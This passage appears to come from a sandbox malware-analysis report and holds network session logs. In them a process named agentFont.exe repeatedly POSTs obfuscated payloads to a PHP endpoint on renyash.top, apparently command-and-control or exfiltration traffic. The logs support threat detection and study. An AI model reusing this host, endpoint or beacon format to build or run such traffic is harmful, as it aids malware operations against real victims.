                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:25.252813101 CET1044OUTData Raw: 54 5a 5d 58 54 47 55 51 59 5f 5b 52 5a 5b 59 5d 55 52 54 5d 51 59 5b 5b 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TZ]XTGUQY_[RZ[Y]URT]QY[[^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.\)!)U4Y&>>E.=T2>Y')#%)3)P)4!=&)*&X"#\.,
                                                                                  Jan 1, 2025 11:28:25.548115015 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:25.678998947 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:22 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  86192.168.2.449999185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:25.809298038 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:26.159049988 CET1044OUTData Raw: 54 52 58 5e 51 44 55 5a 59 5f 5b 52 5a 58 59 56 55 56 54 5a 51 59 5b 58 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TRX^QDUZY_[RZXYVUVTZQY[X^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW._(%T4><$.=-R$,>_3>X520?1S)'_5[9^):&X"#\.
                                                                                  Jan 1, 2025 11:28:26.466671944 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:26.599980116 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:23 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  87192.168.2.450006185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:26.743664980 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:27.096729040 CET1044OUTData Raw: 51 52 58 59 51 43 55 5f 59 5f 5b 52 5a 5f 59 51 55 54 54 50 51 58 5b 51 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QRXYQCU_Y_[RZ_YQUTTPQX[Q^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-<=#-$\&=%.-/S%?^'.#%"$,1Q=$^"=(:&X"#\.<
                                                                                  Jan 1, 2025 11:28:27.379924059 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:27.509948015 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:23 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  88192.168.2.450011185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:27.838180065 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1340
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  89192.168.2.450016185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:27.951567888 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:28.299681902 CET1044OUTData Raw: 54 5a 5d 5f 54 41 55 5f 59 5f 5b 52 5a 5c 59 5d 55 51 54 59 51 50 5b 5a 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TZ]_TAU_Y_[RZ\Y]UQTYQP[Z^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.Z+T: >;19.,&>3Z&_"5)W3Y6=$"[6)*&X"#\.0
                                                                                  Jan 1, 2025 11:28:28.588006020 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:28.718091965 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:25 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  90192.168.2.450023185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:28.848246098 CET302OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1032
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:28:29.205919027 CET1032OUTData Raw: 54 57 5d 5c 54 4b 50 5a 59 5f 5b 52 5a 5a 59 55 55 52 54 5d 51 59 5b 58 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TW]\TKPZY_[RZZYUURT]QY[X^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.Z?%4=8[1&,-7&<='<95:0.=B8!>*<:&X"#\.<
                                                                                  Jan 1, 2025 11:28:29.521929026 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:29.659703970 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:26 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  91192.168.2.450029185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:29.801613092 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:30.159755945 CET1044OUTData Raw: 54 57 5d 5f 54 44 50 5a 59 5f 5b 52 5a 52 59 50 55 51 54 5e 51 5d 5b 5e 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TW]_TDPZY_[RZRYPUQT^Q][^^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-<>7>;26@.=+V2<2'>Y"1V05W=3Z6"+&X"#\.
                                                                                  Jan 1, 2025 11:28:30.446765900 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:30.581449986 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:27 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  92192.168.2.450035185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:30.738758087 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:31.096575975 CET1044OUTData Raw: 54 56 5d 5c 51 40 50 5a 59 5f 5b 52 5a 5b 59 5d 55 5f 54 50 51 5a 5b 5a 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TV]\Q@PZY_[RZ[Y]U_TPQZ[Z^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-?)#.(X%-:=#W2?-'>!.$?P)'3"=X?&X"#\.,
                                                                                  Jan 1, 2025 11:28:31.395595074 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:31.531768084 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:27 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  93192.168.2.450041185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:31.661134958 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:32.018491983 CET1044OUTData Raw: 54 56 58 5f 51 44 55 5e 59 5f 5b 52 5a 52 59 5c 55 56 54 58 51 5c 5b 5a 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TVX_QDU^Y_[RZRY\UVTXQ\[Z^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.]<&# 29->$%Y>\',-5C!W'/%*4#>9(&X"#\.
                                                                                  Jan 1, 2025 11:28:32.298367977 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:32.426300049 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:28 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  94192.168.2.450047185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:32.555931091 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1040
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:32.909048080 CET1040OUTData Raw: 54 55 5d 5b 51 43 55 5e 59 5f 5b 52 5a 5a 59 51 55 56 54 59 51 5d 5b 5d 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TU][QCU^Y_[RZZYQUVTYQ][]^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.\+.#-&"E.'1/>^$-"5!U0/"*<6=\?:&X"#\.8


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  95192.168.2.450049185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:32.933109999 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1340
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:33.284051895 CET1340OUTData Raw: 51 57 5d 5a 51 46 55 59 59 5f 5b 52 5a 52 59 50 55 5f 54 50 51 50 5b 5b 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QW]ZQFUYY_[RZRYPU_TPQP[[^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-+5V"= X2"-=;R&/>Y'/>_69$2>7?^"=2<:&X"#\.
                                                                                  Jan 1, 2025 11:28:33.573587894 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:33.706844091 CET308INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:30 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 02 1a 24 01 3e 1f 2c 01 30 2b 26 08 33 00 30 09 3f 33 2a 58 38 02 0f 1f 25 14 30 1d 29 23 2b 53 28 2b 26 5d 2a 3d 0d 01 25 21 30 12 32 0f 2a 51 00 1c 23 1e 28 15 0e 02 3c 16 21 0e 3e 32 3f 5d 3c 02 3f 58 36 2a 23 57 33 2b 03 0a 33 3d 3b 11 3c 06 23 0f 2f 26 2b 5c 2c 0d 0d 5e 30 1c 2f 52 09 14 22 04 3d 1d 09 55 25 0c 39 02 26 33 28 05 22 06 3c 0c 34 32 21 1d 20 30 3b 58 3c 2e 27 58 20 32 2e 5c 25 12 08 45 3e 2d 02 0f 36 3e 23 54 2c 03 23 56 0f 36 5d 51
                                                                                  Data Ascii: $>,0+&30?3*X8%0)#+S(+&]*=%!02*Q#(<!>2?]<?X6*#W3+3=;<#/&+\,^0/R"=U%9&3("<42! 0;X<.'X 2.\%E>-6>#T,#V6]Q


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  96192.168.2.450054185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:33.053991079 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:33.409028053 CET1044OUTData Raw: 51 57 5d 5f 54 44 50 5e 59 5f 5b 52 5a 52 59 54 55 54 54 5a 51 5d 5b 59 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QW]_TDP^Y_[RZRYTUTTZQ][Y^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-?"".$%=C.+S$<1%/&["6-Q'/P>'<"=)*&X"#\.
                                                                                  Jan 1, 2025 11:28:33.688184977 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:33.817482948 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:30 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  97192.168.2.450060185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:33.941051960 CET302OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:28:34.299662113 CET1044OUTData Raw: 51 52 58 5c 54 40 55 5b 59 5f 5b 52 5a 5b 59 51 55 53 54 50 51 50 5b 59 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QRX\T@U[Y_[RZ[YQUSTPQP[Y^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-(T!T#$Z%."B.[$$?2\'95%,1Q)4+"5X+:&X"#\.,
                                                                                  Jan 1, 2025 11:28:34.586559057 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:34.751729012 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:31 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  98192.168.2.450066185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:34.883841991 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:35.237279892 CET1044OUTData Raw: 54 5a 5d 53 54 40 55 5b 59 5f 5b 52 5a 5f 59 5c 55 51 54 59 51 51 5b 50 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TZ]ST@U[Y_[RZ_Y\UQTYQQ[P^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.]?!S =7&*D.>/S%/^0>"%V$+$/^5:<&X"#\.<
                                                                                  Jan 1, 2025 11:28:35.529567003 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:35.664031982 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:32 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  99192.168.2.450072185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:35.786175013 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:36.143436909 CET1044OUTData Raw: 51 50 58 5c 54 44 50 5d 59 5f 5b 52 5a 59 59 50 55 54 54 5c 51 5f 5b 50 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
